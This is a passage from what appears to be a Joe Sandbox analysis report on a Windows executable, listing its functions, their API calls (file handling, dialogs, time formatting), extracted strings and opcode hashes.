                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 88f524e7558eb29eac700e217f4c49765aee5d9ce05744eadfef50aebd8b35b6
                                        • Instruction ID: 3bc3fddbc912e17962db20697912c245c494c5528cba5153662a7ae99b2d4628
                                        • Opcode Fuzzy Hash: 88f524e7558eb29eac700e217f4c49765aee5d9ce05744eadfef50aebd8b35b6
                                        • Instruction Fuzzy Hash: DEB012E52FD080BC7519D2071C12C77030DC4C0B10371D22EF805C10C0D9804C1C0833
                                        Function 002EE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 61ca3120f681260874eab2e1bc54ee93dbe84f83f948cfaf17d7837a64f17b22
                                        • Instruction ID: 5762561cb0de762c29674aebf877114101d0a0649550eddaab948e1692c85b11
                                        • Opcode Fuzzy Hash: 61ca3120f681260874eab2e1bc54ee93dbe84f83f948cfaf17d7837a64f17b22
                                        • Instruction Fuzzy Hash: 74A012E11F50813C741452031C12C77030DC0C0B10371521DF410900C05D8008140833
                                        Function 002EE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 7491e0f34400398da36134e062a46b2ca13361a187c780923160e609f3c6ed99
                                        • Instruction ID: 879e6c28e46ffb63ad0cd36a24a82bcea7a4fb92d8476825e5c0ae3ed6a0119e
                                        • Opcode Fuzzy Hash: 7491e0f34400398da36134e062a46b2ca13361a187c780923160e609f3c6ed99
                                        • Instruction Fuzzy Hash: 13A012E11F90817C741452031C12C77030DC0C0B10371561DF401800C0598008140833
                                        Function 002EE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9d2685b6c905e9fad06085a1b2ba4089226201ee0f114b299eb0fab562ae435b
                                        • Instruction ID: 879e6c28e46ffb63ad0cd36a24a82bcea7a4fb92d8476825e5c0ae3ed6a0119e
                                        • Opcode Fuzzy Hash: 9d2685b6c905e9fad06085a1b2ba4089226201ee0f114b299eb0fab562ae435b
                                        • Instruction Fuzzy Hash: 13A012E11F90817C741452031C12C77030DC0C0B10371561DF401800C0598008140833
                                        Function 002EE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5d20a3f83e5d41c794046ba19390ac28be8371064b5809cd97dca79038623981
                                        • Instruction ID: 879e6c28e46ffb63ad0cd36a24a82bcea7a4fb92d8476825e5c0ae3ed6a0119e
                                        • Opcode Fuzzy Hash: 5d20a3f83e5d41c794046ba19390ac28be8371064b5809cd97dca79038623981
                                        • Instruction Fuzzy Hash: 13A012E11F90817C741452031C12C77030DC0C0B10371561DF401800C0598008140833
                                        Function 002EE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 4b8718cb4825513778fa03bdf83e71fd0560ef29cdae9651c448477b90661bd3
                                        • Instruction ID: 879e6c28e46ffb63ad0cd36a24a82bcea7a4fb92d8476825e5c0ae3ed6a0119e
                                        • Opcode Fuzzy Hash: 4b8718cb4825513778fa03bdf83e71fd0560ef29cdae9651c448477b90661bd3
                                        • Instruction Fuzzy Hash: 13A012E11F90817C741452031C12C77030DC0C0B10371561DF401800C0598008140833
                                        Function 002EE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f58a687d7eb5e50db31431445b2d4b6270751ddcac023b4d21f869ffc8748abb
                                        • Instruction ID: 879e6c28e46ffb63ad0cd36a24a82bcea7a4fb92d8476825e5c0ae3ed6a0119e
                                        • Opcode Fuzzy Hash: f58a687d7eb5e50db31431445b2d4b6270751ddcac023b4d21f869ffc8748abb
                                        • Instruction Fuzzy Hash: 13A012E11F90817C741452031C12C77030DC0C0B10371561DF401800C0598008140833
                                        Function 002D9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEndOfFile.KERNELBASE(?,002D903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 002D9F0C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: File
                                        • String ID:
                                        • API String ID: 749574446-0
                                        • Opcode ID: b6aef4a27669720c60d84e7a97ae6b5e975e4aafb7dfdedcf4e48a7f9307de0a
                                        • Instruction ID: 8aab86129fab46631e335d5a4da9368bf674d7efa0eaddf5a16812605570319b
                                        • Opcode Fuzzy Hash: b6aef4a27669720c60d84e7a97ae6b5e975e4aafb7dfdedcf4e48a7f9307de0a
                                        • Instruction Fuzzy Hash: 0FA0223008200E8BCE022B30CE2800E3B28FF20BC0B0002E8A00BCF0B2CB23880BCB00
                                        Function 002EAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?,002EAE72,C:\Users\user\Desktop,00000000,0031946A,00000006), ref: 002EAC08
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        • Opcode ID: 2433275b4d8757e673e9b876d19c4186fab1bd147bca2edb25608648c2cbd8e1
                                        • Instruction ID: b06b785d5675be77bf64ad88fc2bfdb7f2610a3eacf20456749e2f9d24b23fbb
                                        • Opcode Fuzzy Hash: 2433275b4d8757e673e9b876d19c4186fab1bd147bca2edb25608648c2cbd8e1
                                        • Instruction Fuzzy Hash: 00A011302022008BC2022B328F0AA0EBAAEAFA2B00F00C02AA00080030CB30C820AA0A
                                        Function 002D9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNELBASE(000000FF,?,?,002D95D6,?,?,?,?,?,00302641,000000FF), ref: 002D963B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: eed557f74b57900b25a81aa5123045f3b1709eace88aa639713ab0459864c9bd
                                        • Instruction ID: ad995c68b1cc65188dbd073780b40a9ad10604c6027f41f0f5dee4fa31da0a66
                                        • Opcode Fuzzy Hash: eed557f74b57900b25a81aa5123045f3b1709eace88aa639713ab0459864c9bd
                                        • Instruction Fuzzy Hash: 18F0E930496B469FDB318E24C45879277EC6B13321F040B1FE0E742AE4D360ADDD8B80

                                        Non-executed Functions

                                        Function 002EC220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 002EC2B1
                                        • EndDialog.USER32(?,00000006), ref: 002EC2C4
                                        • GetDlgItem.USER32(?,0000006C), ref: 002EC2E0
                                        • SetFocus.USER32(00000000), ref: 002EC2E7
                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 002EC321
                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 002EC358
                                        • FindFirstFileW.KERNEL32(?,?), ref: 002EC36E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002EC38C
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002EC39C
                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002EC3B8
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002EC3D4
                                        • _swprintf.LIBCMT ref: 002EC404
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 002EC417
                                        • FindClose.KERNEL32(00000000), ref: 002EC41E
                                        • _swprintf.LIBCMT ref: 002EC477
                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 002EC48A
                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 002EC4A7
                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 002EC4C7
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002EC4D7
                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002EC4F1
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002EC509
                                        • _swprintf.LIBCMT ref: 002EC535
                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 002EC548
                                        • _swprintf.LIBCMT ref: 002EC59C
                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 002EC5AF
                                          • Part of subcall function 002EAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002EAF35
                                          • Part of subcall function 002EAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0030E72C,?,?), ref: 002EAF84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                        • String ID: %s %s$%s %s %s$P.$REPLACEFILEDLG
                                        • API String ID: 797121971-532198066
                                        • Opcode ID: 8cfebe6439be5302724e0afa1af1ac113ab5e63f225bc179b3553db4176e7465
                                        • Instruction ID: 7f450ed15d421b2898532ee37dbec6f7bdde9841c2038c61fe61f019469f3d7d
                                        • Opcode Fuzzy Hash: 8cfebe6439be5302724e0afa1af1ac113ab5e63f225bc179b3553db4176e7465
                                        • Instruction Fuzzy Hash: BE91F772598384BBD222EBE1CC89FFB77ACEB49700F40481AF745D2080D771EA158B62
                                        Function 002D6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D6FAA
                                        • _wcslen.LIBCMT ref: 002D7013
                                        • _wcslen.LIBCMT ref: 002D7084
                                          • Part of subcall function 002D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 002D7AAB
                                          • Part of subcall function 002D7A9C: GetLastError.KERNEL32 ref: 002D7AF1
                                          • Part of subcall function 002D7A9C: CloseHandle.KERNEL32(?), ref: 002D7B00
                                          • Part of subcall function 002DA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,002D977F,?,?,002D95CF,?,?,?,?,?,00302641,000000FF), ref: 002DA1F1
                                          • Part of subcall function 002DA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,002D977F,?,?,002D95CF,?,?,?,?,?,00302641), ref: 002DA21F
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 002D7139
                                        • CloseHandle.KERNEL32(00000000), ref: 002D7155
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 002D7298
                                          • Part of subcall function 002D9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002D73BC,?,?,?,00000000), ref: 002D9DBC
                                          • Part of subcall function 002D9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 002D9E70
                                          • Part of subcall function 002D9620: CloseHandle.KERNELBASE(000000FF,?,?,002D95D6,?,?,?,?,?,00302641,000000FF), ref: 002D963B
                                          • Part of subcall function 002DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA501
                                          • Part of subcall function 002DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA532
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 3983180755-3508440684
                                        • Opcode ID: ff00c4c7444e5409725d813ed4ca34aa20c610a84652464f7e1a9d35eff6a0f6
                                        • Instruction ID: 7b4e23095c77ae8fe1d4f7302adf5ecc390a1c6dac381011796858e842964979
                                        • Opcode Fuzzy Hash: ff00c4c7444e5409725d813ed4ca34aa20c610a84652464f7e1a9d35eff6a0f6
                                        • Instruction Fuzzy Hash: 5AC1C571924645AADB25DF74CC45FEEB3ACAF08300F00455BFA56A3382E774AE648F61
                                        Function 002FD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 4593c5c3ec663c81582dfa032e8fe5c3c0c32071fb98fe627dc14424141a349a
                                        • Instruction ID: 071d17b458a6c9dce2da09aa068647159413eec9cba709e56dc7f300c27db276
                                        • Opcode Fuzzy Hash: 4593c5c3ec663c81582dfa032e8fe5c3c0c32071fb98fe627dc14424141a349a
                                        • Instruction Fuzzy Hash: 58C24871E2422D8BDF26CE28DD407EAB3B9EB44384F1541EAD94DE7250E774AE918F40
                                        Function 002D32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog_swprintf
                                        • String ID: CMT$h%u$hc%u
                                        • API String ID: 146138363-3282847064
                                        • Opcode ID: 6f5b16627e5b71bf5e688858520c8cef9d26e855043560aba2184771c742c347
                                        • Instruction ID: b247c1b96f5227cc12adc61ffb280a2877e53cd59a88a0c4f016c67cb7da1509
                                        • Opcode Fuzzy Hash: 6f5b16627e5b71bf5e688858520c8cef9d26e855043560aba2184771c742c347
                                        • Instruction Fuzzy Hash: 3D32E271524285AFDB14DF74C895AEA3BA5AF15300F08047FFD8A8B382DB749E59CB21
                                        Function 002D286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D2874
                                        • _strlen.LIBCMT ref: 002D2E3F
                                          • Part of subcall function 002E02BA: __EH_prolog.LIBCMT ref: 002E02BF
